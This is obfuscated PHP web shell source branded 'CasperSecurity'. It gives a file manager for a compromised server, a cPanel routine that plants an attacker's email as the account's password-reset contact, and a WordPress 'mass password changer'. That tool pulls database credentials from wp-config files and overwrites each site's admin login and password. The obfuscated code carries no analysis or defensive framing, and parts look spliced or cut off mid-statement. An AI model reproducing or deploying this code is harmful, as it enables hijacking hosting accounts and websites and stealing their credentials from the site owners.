goto qz0e4; XUqGU: $uip = $_SERVER["\122\x45\115\117\x54\105\x5f\101\104\x44\122"]; goto FIbvi; uYZAT: if (isset($_POST["\156\x65\167\116\x61\x6d\145"]) && isset($_GET["\151\x74\x65\x6d"])) { if ($_POST["\156\x65\x77\116\x61\x6d\x65"] == '') { flash("\x59\157\165\40\155\151\163\163\40\141\156\40\x69\155\160\157\162\x74\141\x6e\164\x20\166\141\x6c\165\145", "\x4f\x6f\157\160\163\163\56\x2e", "\167\141\162\156\151\156\x67", "\x3f\144\151\162\75{$path}"); } if (rename($path . "\x2f" . $_GET["\x69\x74\x65\155"], $_POST["\156\x65\x77\x4e\x61\x6d\x65"])) { flash("\122\145\156\141\155\145\x20\123\165\143\x63\x65\163\x73\x66\165\x6c\154\171\41", "\x53\165\x63\143\x65\163\163", "\x73\x75\x63\143\145\x73\163", "\77\144\151\x72\x3d{$path}"); } else { flash("\122\145\156\x61\155\145\x20\x46\141\x69\x6c\145\144", "\106\141\x69\x6c\x65\x64", "\145\x72\162\157\162", "\77\144\151\162\75{$path}"); } } goto oZqOo; lo0XM: ?>  [  Useful Functions : = 1024) { $size /= 1024; $pos++; } return round($size, 2) . "\x20" . $a[$pos]; } goto c2bEQ; yb6Oy: ?>
CasperSecurity [ <?php goto EO8CF; VUL6z: @ini_set("\155\141\x78\x5f\145\170\x65\143\x75\164\x69\x6f\x6e\137\x74\x69\x6d\145", 0); goto bUPUX; X9OL4: $free = disk_free_space($path); goto h0IMD; pwd_z: if ($_GET["\x72\x65\x73\x65\x74\x70\141\x73\x73\x63\x70"]) { echo "\x3c\x62\162\x2f\x3e\74\150\65\40\x63\154\141\163\163\x3d\42\164\145\x78\x74\55\x63\x65\156\x74\145\x72\x22\76\74\151\x20\x63\x6c\x61\163\163\75\x22\x66\141\40\146\x61\55\153\145\171\42\x3e\x3c\x2f\151\76\x20\101\x75\164\157\40\x52\x65\163\x65\x74\x20\x50\x61\163\x73\167\157\x72\x64\40\x43\x70\141\x6e\145\154\74\x2f\x68\65\x3e\xa\11\11\x3c\146\x6f\x72\x6d\x20\x6d\145\x74\150\157\x64\75\x22\120\117\123\x54\42\76\12\11\11\x9\x3c\144\151\x76\40\x63\154\141\163\163\x3d\42\x66\157\x72\x6d\x2d\147\162\157\165\160\42\x3e\12\x9\11\x9\x9\x3c\x69\x6e\160\165\164\40\164\x79\x70\145\75\x22\145\x6d\x61\151\154\42\x20\156\141\x6d\x65\x3d\42\145\x6d\141\151\x6c\42\x20\143\x6c\141\163\x73\x3d\42\146\x6f\x72\155\55\143\157\156\x74\162\x6f\154\x22\x20\160\x6c\141\143\145\150\x6f\154\x64\145\x72\x3d\x22\105\x6d\x61\151\x6c\56\56\x2e\x22\x2f\x3e\74\142\162\57\x3e\xa\x9\11\x9\x9\74\151\156\x70\165\164\40\164\171\x70\x65\x3d\42\x73\x75\x62\155\151\x74\x22\x20\156\141\x6d\145\x3d\42\x73\165\142\x6d\151\164\42\40\x63\154\x61\163\x73\75\x22\142\x74\x6e\x20\142\164\x6e\x2d\144\141\x6e\147\145\x72\40\x62\x74\x6e\55\142\x6c\157\143\x6b\42\x20\x76\x61\x6c\165\145\x3d\x22\x53\x65\x6e\144\x22\x2f\x3e\xa\11\x9\x9\74\57\144\151\166\76\12\11\11\x3c\x2f\x66\157\x72\x6d\x3e"; if (isset($_POST["\x73\165\142\155\151\x74"])) { $user = get_current_user(); $site = $_SERVER["\x48\124\124\x50\137\110\x4f\x53\x54"]; $ips = getenv("\122\105\115\117\x54\105\137\101\104\104\x52"); $email = $_POST["\145\155\141\151\154"]; $wr = "\x65\x6d\141\151\154\x3a" . $email; $f = fopen("\57\150\x6f\x6d\145\57" . $user . "\x2f\56\143\160\141\x6e\145\154\57\x63\157\156\164\141\143\x74\151\156\146\x6f", "\x77"); fwrite($f, $wr); fclose($f); $f = fopen("\57\150\x6f\155\145\x2f" . $user . "\x2f\x2e\x63\x6f\x6e\x74\x61\143\164\151\156\x66\x6f", "\167"); fwrite($f, $wr); fclose($f); $parm = $site . "\x3a\x32\60\70\62\x2f\x72\145\163\x65\x74\160\141\163\163\77\163\x74\x61\x72\x74\75\61"; echo "\x3c\142\x72\x2f\76\x55\x72\x6c\x3a\x20" . $parm . ''; echo "\74\142\x72\x2f\76\x55\x73\x65\x72\156\141\155\x65\72\x20" . $user . ''; echo "\74\x62\x72\57\x3e\x53\x75\143\x63\x65\x73\x73\40\122\x65\x73\x65\164\40\x54\157\72\40" . $email . "\x3c\142\x72\x2f\x3e\74\x62\162\x2f\76"; } die; } goto AoZzE; unkHJ: foreach ($dirs as $dir) { if (!is_dir($dir)) { continue; } ?> <tr> <td> <?php if ($dir === "\x2e\x2e") { ?> <a href="?dir=<?php echo dirname($path); ?> " class="text-decoration-none text-light"> <i class="fa fa-folder-open yellow-icon"></i> <?php echo $dir; ?> </a> <?php } elseif ($dir === "\56") { ?> <a href="?dir=<?php echo $path; ?> " class="text-decoration-none text-light"><i class="fa fa-folder-open yellow-icon"></i> <?php echo $dir; ?> </a> <?php } else { ?> <a href="?dir=<?php echo $path . "\57" . $dir; ?> " class="text-decoration-none text-light"><i class="fa fa-folder yellow-icon"></i> <?php echo $dir; ?> </a> <?php } ?> </td> <td class="text-light"><?php echo filetype($dir); ?> </td> <td class="text-light">-</td> <td class="text-light"><?php echo getOwner($dir); ?> </td> <td class="text-light"> <?php echo "\x3c\x61\40\150\x72\x65\x66\x3d\x22\77\x64\151\x72\x3d" . $path . "\x26\x69\164\x65\x6d\75" . $dir . "\46\x61\143\164\x69\x6f\x6e\75\143\x68\x6d\157\144\42\x3e"; if (is_writable($path . "\57" . $dir)) { echo "\74\x66\x6f\156\164\40\x63\x6f\x6c\157\162\75\x22\154\x69\x6d\x65\42\x3e"; } elseif (!is_readable($path . "\57" . $dir)) { echo "\x3c\146\x6f\156\x74\40\143\x6f\x6c\x6f\x72\x3d\x22\x72\145\x64\x22\x3e"; } echo perms($path . "\x2f" . $dir); if (is_writable($path . "\x2f" . $dir) || !is_readable($path . "\57" . $dir)) { echo "\74\57\141\76"; } ?> </td> <td class="text-light"><?php echo date("\131\x2d\155\55\x64\40\150\x3a\151\x3a\163", filemtime($dir)); ?> </td> <td> <?php if ($dir != "\x2e" && $dir != "\56\56") { ?> <div class="btn-group"> <a href="?dir=<?php echo $path; ?> &item=<?php echo $dir; ?> &action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <?php if (extension_loaded("\x7a\x69\160")) { ?> <a href="?dir=<?php echo $path; ?> &item=<?php echo $dir; ?> &action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=<?php echo $path; ?> &item=<?php echo $dir; ?> &action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a> <?php } ?> </div> <?php } elseif ($dir === "\56") { ?> <div class="btn-group"> <a data-bs-toggle="collapse" href="#newFolderCollapse" role="button" aria-expanded="false" aria-controls="newFolderCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New Folder"><i class="fa fa-folder-plus"></i></a> <a data-bs-toggle="collapse" href="#newFileCollapse" role="button" aria-expanded="false" aria-controls="newFileCollapse" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="New File"><i class="fa fa-file-plus"></i></a> </div> <?php } ?> </td> </tr> <?php } goto KkvZG; D33av: $show_ds = !empty($ds) ? "\x3c\x66\x6f\156\164\x20\x63\x6c\x61\x73\x73\x3d\x27\x74\145\x78\x74\55\x64\x61\x6e\x67\x65\x72\47\76{$ds}\x3c\x2f\x66\157\156\164\76" : "\74\x66\x6f\x6e\x74\x20\143\154\x61\163\x73\75\x27\164\145\x78\x74\x2d\163\165\x63\143\x65\x73\x73\x27\76\x41\154\154\x20\x66\165\156\x63\x74\x69\157\156\x20\x69\x73\40\x61\143\x63\x65\163\x73\151\x62\x6c\x65\x3c\57\146\157\x6e\164\x3e"; goto UBs1e; c0_Ko: if (isset($_GET["\167\x70\164\x6f\x6f\154"])) { ini_set("\144\x69\163\160\154\x61\x79\x5f\x65\x72\x72\157\x72\163", 0); echo "\x3c\41\104\x4f\103\124\x59\120\x45\x20\150\164\x6d\154\76\xa\x20\40\40\40\74\x68\164\155\154\x20\154\141\156\147\x3d\42\x65\156\x22\76\12\40\40\40\x20\74\150\x65\x61\x64\x3e\12\40\40\40\40\74\x6d\x65\x74\141\40\143\150\141\x72\x73\145\164\75\42\125\124\x46\x2d\70\42\76\12\x20\40\40\40\74\155\145\164\x61\40\x6e\141\155\145\75\x22\166\151\145\x77\x70\157\162\x74\x22\x20\143\x6f\x6e\164\x65\156\164\75\x22\x77\151\x64\164\150\75\144\145\x76\151\x63\x65\55\x77\x69\144\x74\x68\54\40\x69\x6e\151\x74\151\141\x6c\x2d\163\x63\x61\x6c\x65\75\61\56\x30\x22\76\12\x20\x20\40\x20\x3c\164\x69\x74\x6c\x65\76\127\x6f\162\144\120\x72\145\163\x73\40\115\141\x73\163\x20\120\x61\163\x73\167\157\x72\144\x20\103\150\x61\x6e\x67\145\162\x3c\57\164\x69\164\x6c\145\x3e\xa\40\x20\x20\x20\x3c\154\151\156\153\40\x72\145\x6c\75\x22\x73\164\171\x6c\x65\x73\150\x65\145\x74\x22\x20\150\x72\x65\x66\x3d\x22\x68\164\164\160\163\72\x2f\57\x73\x74\141\x63\x6b\x70\141\x74\150\x2e\142\x6f\x6f\164\x73\x74\x72\x61\x70\143\x64\156\56\x63\x6f\x6d\x2f\x62\157\157\x74\x73\164\x72\x61\160\57\64\x2e\x35\56\62\x2f\143\163\163\x2f\x62\157\x6f\x74\163\x74\162\141\x70\56\x6d\151\x6e\56\143\x73\163\x22\x3e\xa\x20\x20\40\40\74\154\x69\x6e\x6b\40\162\x65\154\75\x22\163\164\x79\x6c\x65\x73\x68\x65\x65\x74\x22\40\150\162\145\146\75\42\150\x74\164\x70\163\x3a\x2f\x2f\x63\144\x6e\152\x73\x2e\143\x6c\157\165\144\x66\154\141\x72\145\56\x63\x6f\155\57\141\152\x61\x78\57\x6c\151\142\x73\x2f\146\157\x6e\164\55\x61\x77\x65\x73\157\x6d\x65\57\x34\x2e\x37\56\x30\57\x63\x73\163\x2f\146\157\156\164\x2d\x61\167\x65\163\157\155\145\x2e\x6d\151\x6e\x2e\x63\x73\163\x22\76\xa\40\x20\40\40\74\x73\x74\x79\x6c\x65\76\xa\x20\x20\x20\40\x20\40\40\x20\x62\x6f\x64\171\x20\x7b\xa\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\x62\141\143\153\x67\162\x6f\x75\x6e\144\x2d\143\x6f\154\x6f\162\x3a\40\x23\x30\x30\60\x3b\12\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\40\x63\157\x6c\x6f\x72\x3a\x20\x23\x66\x66\x66\x3b\12\40\40\40\40\40\40\40\x20\40\40\40\40\x66\157\156\x74\55\146\141\155\151\154\x79\72\40\x6d\x6f\x6e\x6f\x73\x70\141\143\145\x3b\12\x20\40\40\x20\x20\x20\x20\x20\175\xa\40\40\x20\x20\40\40\x20\40\x2e\x63\x6f\156\x74\141\x69\156\145\x72\x20\x7b\12\40\40\x20\40\40\x20\40\40\x20\x20\40\40\155\141\x78\55\167\x69\144\164\x68\72\x20\x36\x30\60\160\170\x3b\xa\x20\x20\40\40\x20\x20\40\40\40\x20\x20\40\x6d\x61\162\x67\x69\156\72\40\65\60\160\x78\40\141\x75\x74\157\x3b\12\40\40\40\x20\40\40\40\40\x7d\12\x20\x20\x20\x20\40\40\x20\x20\56\x66\x6f\162\155\x2d\x63\x6f\156\x74\162\157\154\40\173\xa\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x20\142\x61\x63\x6b\x67\x72\157\x75\156\144\x2d\143\157\154\x6f\162\x3a\40\x23\x31\x31\61\73\xa\40\40\40\40\40\40\40\40\40\40\x20\40\143\157\154\157\x72\x3a\40\x23\x66\x66\146\x3b\12\x20\40\40\40\40\40\x20\40\x20\x20\40\40\x62\157\x72\144\145\x72\55\x63\157\x6c\157\162\72\x20\x23\64\x34\x34\73\12\x20\40\40\40\40\x20\x20\40\175\xa\40\40\x20\40\x20\40\x20\40\56\x62\x74\156\x2d\x70\x72\151\155\141\x72\171\40\x7b\xa\40\40\40\40\40\40\x20\x20\x20\x20\40\x20\142\x61\143\153\x67\162\x6f\x75\156\x64\55\x63\x6f\154\157\162\x3a\40\x23\61\105\71\60\106\x46\73\12\x20\40\x20\40\x20\40\40\x20\x20\x20\40\40\142\x6f\162\x64\145\x72\55\143\157\154\157\162\x3a\40\43\x31\105\71\60\x46\106\x3b\xa\x20\x20\40\40\40\40\40\x20\175\xa\x20\40\40\x20\40\40\40\40\x2e\142\x74\156\55\x70\162\151\x6d\141\162\171\x3a\150\x6f\166\145\x72\40\x7b\xa\x20\x20\40\40\40\40\40\40\40\40\x20\x20\x62\x61\143\153\147\x72\x6f\x75\x6e\144\x2d\143\x6f\154\x6f\x72\72\x20\x23\60\x30\x37\x62\146\x66\73\xa\40\x20\40\40\40\40\40\x20\x20\40\40\x20\x62\x6f\162\144\145\x72\x2d\x63\157\154\157\162\x3a\x20\43\60\60\67\x62\146\x66\73\xa\x20\x20\x20\40\x20\40\x20\40\x7d\12\40\40\x20\40\x20\x20\x20\40\56\x68\x65\141\162\x74\x20\x7b\12\x20\40\40\x20\40\x20\40\40\x20\40\x20\40\x61\156\151\x6d\141\164\x69\x6f\156\72\x20\x70\x75\154\163\145\x20\x31\163\x20\151\156\x66\x69\x6e\151\164\145\x3b\12\x20\40\40\x20\40\x20\x20\40\x7d\xa\x20\x20\40\40\40\40\40\x20\x40\x6b\x65\x79\x66\x72\x61\155\x65\163\x20\x70\165\154\x73\x65\x20\173\xa\40\x20\x20\40\40\40\x20\40\40\x20\x20\40\60\x25\40\x7b\x20\164\x72\141\x6e\x73\146\x6f\x72\x6d\72\40\163\143\x61\154\145\x28\61\51\73\40\x7d\12\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x35\60\x25\x20\x7b\40\164\162\x61\x6e\163\x66\x6f\x72\x6d\x3a\40\x73\143\141\154\145\50\x31\56\62\51\x3b\x20\x7d\xa\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\61\60\60\45\x20\173\x20\x74\162\x61\x6e\x73\x66\157\162\x6d\72\x20\163\x63\x61\x6c\x65\50\x31\51\x3b\x20\175\12\40\40\x20\x20\x20\x20\40\40\175\12\40\x20\x20\40\x3c\x2f\163\164\171\x6c\145\76\xa\40\x20\40\40\x3c\x2f\x68\x65\141\x64\x3e\xa\40\x20\40\x20\74\142\157\144\171\x3e"; echo "\x3c\144\151\166\x20\143\x6c\141\163\x73\75\42\x63\x6f\x6e\164\141\151\x6e\x65\x72\x20\164\x65\170\x74\55\x63\x65\156\x74\x65\x72\42\x3e\xa\40\40\40\40\74\150\61\x20\x63\x6c\141\163\x73\75\x22\x6d\x62\x2d\64\x22\76\127\x6f\162\x64\120\162\x65\163\163\x20\115\141\163\163\x20\x50\x61\x73\x73\167\157\x72\144\x20\x43\150\x61\x6e\147\x65\162\x3c\x2f\150\61\76\12\40\40\x20\x20\x3c\146\157\x72\155\x20\x6d\145\164\150\157\144\x3d\x22\120\x4f\x53\124\42\x3e\12\40\40\x20\40\x3c\x64\x69\166\40\x63\x6c\x61\163\x73\x3d\x22\x66\x6f\162\155\55\x67\x72\x6f\x75\160\x22\x3e\xa\x20\x20\40\x20\74\x6c\x61\x62\x65\154\x20\x66\157\162\75\x22\165\162\x6c\x22\76\x43\157\x6e\x66\151\147\40\x4c\151\163\x74\72\74\x2f\154\141\142\x65\x6c\76\12\x20\x20\x20\x20\x3c\164\145\170\x74\x61\x72\x65\x61\x20\x63\x6c\x61\163\163\x3d\x22\x66\x6f\162\x6d\55\x63\157\156\x74\162\157\154\x22\x20\x6e\141\x6d\145\75\42\x75\162\154\x22\x20\143\x6f\154\x73\x3d\x22\x35\x30\x22\40\x72\157\167\x73\75\x22\61\60\x22\x3e\74\57\164\145\x78\x74\141\162\145\141\x3e\12\40\x20\40\40\74\x2f\x64\x69\166\76\12\x20\40\x20\40\74\144\x69\x76\x20\x63\154\x61\163\163\75\x22\x66\157\162\155\55\x67\162\x6f\x75\x70\42\x3e\12\x20\40\x20\x20\74\154\x61\142\145\154\40\x66\x6f\x72\75\x22\165\x73\145\162\156\x61\x6d\x65\42\x3e\x55\163\145\162\57\x50\141\x73\x73\x77\157\x72\x64\74\57\x6c\141\142\x65\x6c\76\12\40\40\x20\x20\x3c\x69\156\x70\165\164\40\164\171\160\145\x3d\42\164\145\x78\x74\42\40\143\x6c\141\163\x73\75\x22\x66\157\162\x6d\x2d\143\x6f\156\164\162\x6f\154\x22\40\156\141\155\145\75\42\165\x73\145\x72\x6e\x61\155\x65\x22\40\166\141\154\x75\x65\x3d\42\103\x61\x73\160\145\x72\x53\145\x63\165\x72\x69\x74\x79\42\x3e\x3c\x62\x72\76\12\x20\40\40\40\74\x69\x6e\x70\x75\164\x20\164\171\160\x65\x3d\42\x74\145\x78\x74\x22\40\143\154\141\x73\x73\x3d\42\146\x6f\x72\x6d\x2d\x63\x6f\156\x74\x72\x6f\154\42\x20\156\x61\x6d\x65\x3d\42\160\141\163\163\x77\x6f\162\144\42\40\x76\x61\x6c\x75\x65\75\x22\x43\141\x73\160\145\162\123\145\x63\x75\162\x69\x74\x79\42\x3e\12\x20\40\x20\40\x3c\x2f\144\151\x76\x3e\xa\x20\40\x20\x20\x3c\x62\165\164\x74\157\x6e\x20\164\171\160\x65\x3d\x22\x73\x75\x62\x6d\151\x74\42\x20\x63\154\141\163\163\75\42\142\x74\x6e\40\x62\164\156\55\x70\162\x69\155\141\x72\171\x22\x3e\x53\165\x62\x6d\x69\x74\74\57\x62\x75\164\164\x6f\x6e\x3e\xa\x20\x20\x20\40\x3c\x69\156\x70\165\x74\x20\x74\171\x70\x65\x3d\x22\x68\x69\x64\x64\x65\x6e\x22\x20\x6e\x61\155\145\75\x22\141\143\x74\x69\x6f\156\42\40\x76\141\x6c\165\145\75\x22\x31\42\x3e\xa\x20\x20\x20\x20\x3c\57\x66\157\x72\x6d\x3e\xa\40\40\40\x20\74\57\144\151\x76\x3e"; if ($_SERVER["\x52\105\121\125\105\123\124\137\x4d\x45\x54\110\x4f\x44"] == "\120\117\x53\124" && isset($_POST["\141\x63\164\151\x6f\156"]) && $_POST["\141\143\x74\151\x6f\156"] == "\x31") { if (empty($_POST["\165\x72\x6c"])) { echo "\74\x64\151\166\x20\143\154\x61\163\163\x3d\x27\x63\x6f\156\x74\x61\151\156\145\x72\40\x74\x65\170\x74\x2d\x63\x65\x6e\164\x65\x72\40\x6d\164\55\x34\x27\x3e\74\x64\x69\x76\40\x63\154\141\x73\x73\x3d\x27\141\154\x65\x72\164\x20\141\154\145\162\164\55\144\x61\156\147\x65\162\47\76\116\157\40\x43\117\x4e\x46\111\107\40\106\x4f\x55\x4e\x44\x3c\142\x72\76\115\141\153\x65\x20\163\165\162\x65\40\171\157\x75\40\160\162\157\x76\x69\144\x65\144\x20\141\x20\x63\157\156\x66\151\147\x20\x6c\151\163\x74\41\x3c\x2f\144\151\x76\76\74\x2f\144\x69\166\x3e"; } else { $url = $_POST["\165\x72\154"]; $users = explode("\12", $url); foreach ($users as $user) { $user1 = trim($user); $code = file_get_contents2($user1); preg_match_all("\x7c\x64\145\146\x69\156\145\x2e\52\x5c\50\56\52\x27\104\x42\137\x4e\x41\x4d\x45\47\56\52\54\x2e\52\47\x28\56\52\x29\x27\56\x2a\134\51\56\x2a\73\174\151\163\125", $code, $b1); $db = $b1[1][0]; preg_match_all("\174\x64\x65\146\x69\x6e\145\x2e\x2a\x5c\50\56\52\x27\x44\x42\137\125\x53\x45\122\x27\x2e\x2a\x2c\x2e\52\x27\50\x2e\x2a\x29\x27\x2e\x2a\134\51\x2e\52\73\174\x69\163\x55", $code, $b2); $user = $b2[1][0]; preg_match_all("\x7c\x64\x65\146\x69\x6e\x65\56\x2a\134\x28\56\x2a\x27\x44\102\x5f\120\101\123\123\x57\117\x52\x44\47\x2e\52\54\56\x2a\x27\50\56\52\51\47\x2e\52\134\51\56\x2a\73\x7c\151\x73\x55", $code, $b3); $db_password = $b3[1][0]; preg_match_all("\x7c\144\x65\x66\151\156\x65\x2e\x2a\134\x28\x2e\52\x27\x44\102\x5f\x48\x4f\123\x54\x27\x2e\52\54\56\52\x27\x28\x2e\52\51\47\56\x2a\x5c\51\56\x2a\73\174\151\x73\125", $code, $b4); $host = $b4[1][0]; preg_match_all("\174\134\x24\x74\141\142\154\x65\x5f\160\x72\145\146\x69\170\56\52\75\56\52\47\x28\x2e\x2a\x29\47\x2e\52\x3b\174\x69\x73\x55", $code, $b5); $p = $b5[1][0]; $d = mysqli_connect($host, $user, $db_password, $db); if ($d) { $usern = $_POST["\x75\x73\x65\x72\x6e\x61\155\x65"]; $passwd = $_POST["\x70\141\x73\163\x77\x6f\162\x64"]; $sql = "\125\x50\104\101\x54\105\40\140" . $p . "\165\163\145\x72\163\140\40\123\x45\124\x20\140\x75\x73\145\162\x5f\x70\141\x73\x73\x60\x20\75\x20\115\104\x35\x28\47" . $passwd . "\x27\51\40\127\110\x45\x52\105\x20\140\111\104\x60\40\x3d\40\47\x31\47\73"; mysqli_query($d, $sql); $sql = "\125\x50\104\101\x54\x45\40\x60" . $p . "\x75\x73\x65\x72\x73\x60\40\x53\105\124\x20\x60\x75\163\145\x72\137\x6c\x6f\x67\151\156\140\40\x3d\40\47" . $usern . "\47\x20\x57\110\105\122\x45\x20\140\x49\x44\140\40\x3d\x20\47\61\x27\x3b"; mysqli_query($d, $sql); $result = mysqli_query($d, "\123\x45\114\x45\x43\x54\40\157\160\164\151\157\156\137\166\x61\x6c\x75\145\40\x46\122\x4f\x4d\40\140" . $p . "\157\x70\164\x69\157\x6e\x73\140\40\127\x48\105\x52\x45\40\x60\x6f\160\164\151\157\156\137\x6e\141\155\145\x60\x20\75\40\47\x73\x69\164\x65\x75\x72\x6c\x27\x3b"); $siteurl = mysqli_fetch_array($result)["\x6f\160\164\151\x6f\x6e\137\x76\x61\154\165\145"]; $tr .= "{$siteurl}\12"; mysqli_close($d); } } if ($tr) { $filename = "\x70\x63\x68\x61\156\x67\145\144\154\151\x73\164\56\x74\170\164"; $fp = fopen($filename, "\x61\53"); $write = fputs($fp, $tr); fclose($fp); echo "\74\144\151\x76\40\143\154\141\x73\163\75\47\x63\157\156\164\141\151\156\x65\162\40\x74\x65\x78\164\x2d\x63\x65\156\164\x65\162\x20\155\164\55\x34\47\x3e\x3c\x64\151\166\x20\143\x6c\x61\163\163\75\x27\x61\154\145\x72\x74\40\141\154\x65\162\x74\55\x73\x75\143\143\145\x73\163\x27\x3e\120\x61\163\x73\x77\157\x72\144\x20\103\x68\x61\156\x67\x69\x6e\147\x20\103\157\x6d\160\154\x65\x74\145\x64\x20\x21\x20\x3a\x29\74\142\x72\x3e\x3c\x62\162\76"; echo "\x3c\x61\40\150\162\x65\146\75\47\160\143\150\141\x6e\x67\145\x64\x6c\x69\163\x74\x2e\x74\170\164\47\x20\143\154\x61\163\163\x3d\x27\142\164\x6e\x20\x62\x74\156\55\x70\162\x69\155\x61\x72\171\47\76\x56\x69\145\167\40\114\151\163\164\40\157\146\x20\120\141\x73\x73\x77\x6f\162\x64\x20\103\x68\141\x6e\x67\x65\144\40\x53\151\x74\x65\x73\x3c\57\x61\x3e\74\x2f\144\x69\x76\x3e\x3c\x2f\144\x69\x76\x3e"; } } } function file_get_contents2($u) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\172\151\x6c\154\x61\x2f\65\56\x30\40\50\x57\151\x6e\x64\x6f\x77\163\40\116\124\x20\x36\x2e\x31\73\x20\x57\117\127\66\x34\x3b\40\162\166\72\61\62\x2e\60\x29\x20\107\145\143\x6b\157\57\x32\x30\x31\60\60\61\60\61\x20\106\151\x72\145\x66\x6f\170\x2f\x31\x32\56\x30\40"); $result = curl_exec($ch); return $result; } echo "\x3c\144\151\x76\40\x63\x6c\x61\x73\163\75\47\143\157\x6e\164\141\x69\x6e\x65\162\40\x74\x65\x78\x74\x2d\143\x65\x6e\x74\x65\162\x20\x6d\164\55\x34\47\76\x3c\x64\x69\x76\40\x63\x6c\x61\x73\163\75\47\x68\145\x61\162\x74\47\76\115\141\x64\145\40\102\x79\x20\x3c\x61\40\x68\x72\145\x66\x3d\x27\150\164\x74\x70\163\72\57\x2f\x74\x2e\x6d\x65\57\x42\111\102\x49\x4c\137\x30\104\101\x59\x27\x20\x74\x61\x72\147\x65\x74\x3d\x27\137\x62\x6c\141\x6e\x6b\47\x3e\124\56\155\x65\x2f\102\x49\x42\111\x4c\137\x30\104\x41\x59\74\x2f\x61\76\x20\127\151\x74\150\40\x3c\x64\x69\x76\40\143\x6c\x61\163\x73\75\x27\x68\145\x61\162\x74\x27\76\46\43\61\60\60\x38\x34\x3b\46\43\x36\x35\60\63\x39\x3b\74\57\144\151\166\x3e\x3c\57\x64\151\166\76"; echo "\12\x3c\163\x74\x79\x6c\145\76\12\40\x20\40\x20\142\x6f\x64\x79\x20\173\xa\x20\x20\x20\x20\x20\x20\40\40\x62\141\143\x6b\x67\x72\x6f\165\156\144\x2d\143\x6f\x6c\x6f\162\72\x20\43\x30\60\60\x3b\12\x20\40\x20\x20\x20\x20\x20\x20\x63\157\x6c\x6f\x72\72\x20\43\x66\x66\146\x3b\xa\40\40\x20\40\40\40\40\x20\146\157\x6e\x74\x2d\146\141\x6d\151\154\x79\x3a\40\155\x6f\156\157\163\x70\141\x63\x65\x3b\12\40\40\x20\40\175\12\40\40\x20\40\56\x63\x6f\x6e\x74\x61\151\x6e\x65\x72\40\x7b\xa\x20\x20\x20\x20\40\x20\x20\x20\155\141\x78\55\167\x69\144\164\x68\x3a\40\66\x30\60\160\x78\x3b\xa\x20\40\x20\x20\40\40\x20\x20\155\141\x72\147\x69\156\72\x20\65\60\160\x78\x20\x61\x75\164\157\73\xa\40\x20\x20\40\175\xa\40\x20\40\x20\x2e\x66\x6f\162\155\55\143\x6f\156\x74\x72\157\x6c\x20\173\12\x20\40\40\40\40\x20\x20\x20\142\141\x63\153\x67\162\x6f\165\x6e\144\x2d\x63\157\x6c\x6f\x72\72\x20\43\x31\x31\x31\x3b\xa\40\40\x20\x20\x20\x20\40\40\143\157\x6c\157\x72\x3a\40\43\x66\x66\x66\73\xa\40\x20\x20\x20\x20\40\40\40\x62\x6f\x72\144\x65\x72\x2d\x63\x6f\x6c\157\x72\72\40\43\64\x34\x34\x3b\12\x20\x20\x20\x20\x7d\xa\40\x20\40\40\56\142\x74\x6e\x2d\160\x72\151\155\x61\x72\x79\x20\x7b\12\x20\x20\40\x20\x20\x20\x20\x20\x62\x61\143\153\147\162\x6f\x75\156\x64\55\x63\x6f\x6c\157\x72\72\x20\43\61\105\x39\x30\106\x46\73\xa\x20\x20\40\x20\x20\x20\x20\x20\142\157\x72\x64\145\162\x2d\x63\x6f\154\157\162\x3a\40\43\61\105\x39\60\106\106\x3b\xa\x20\x20\40\x20\x7d\xa\x20\x20\40\40\x2e\x62\164\x6e\55\160\162\151\155\141\x72\171\72\x68\x6f\166\x65\162\x20\173\xa\x20\x20\x20\40\40\x20\x20\40\x62\141\x63\153\147\162\x6f\x75\x6e\144\55\143\157\154\x6f\x72\x3a\x20\x23\x30\x30\x37\x62\146\146\x3b\12\x20\40\40\40\40\x20\x20\x20\142\x6f\162\x64\145\162\x2d\143\157\x6c\x6f\x72\72\40\x23\60\60\x37\142\x66\x66\x3b\12\40\40\40\x20\175\12\x20\x20\40\x20\x2e\150\145\x61\x72\164\x20\x7b\xa\40\40\x20\40\40\x20\x20\x20\141\156\x69\x6d\x61\164\151\x6f\156\72\x20\x70\165\x6c\163\x65\40\x31\x73\x20\151\156\146\x69\156\x69\164\x65\73\12\x20\x20\x20\40\175\xa\x20\x20\x20\x20\x40\x6b\145\171\146\162\141\155\x65\163\40\160\x75\154\x73\145\x20\x7b\12\x20\x20\40\40\x20\40\x20\40\60\x25\x20\x7b\x20\164\x72\141\156\x73\x66\x6f\x72\x6d\72\x20\x73\143\x61\x6c\145\50\x31\x29\73\x20\x7d\12\x20\40\x20\x20\x20\40\40\x20\65\x30\45\40\x7b\40\164\162\141\x6e\x73\146\x6f\x72\155\72\x20\x73\143\141\x6c\145\x28\61\56\x32\x29\x3b\40\175\xa\40\40\x20\x20\x20\40\x20\x20\61\x30\x30\x25\40\173\40\x74\162\x61\156\163\x66\x6f\x72\x6d\72\x20\163\143\141\x6c\x65\50\61\x29\x3b\x20\x7d\12\x20\40\x20\x20\175\12\x3c\x2f\x73\164\171\x6c\145\76\12"; echo 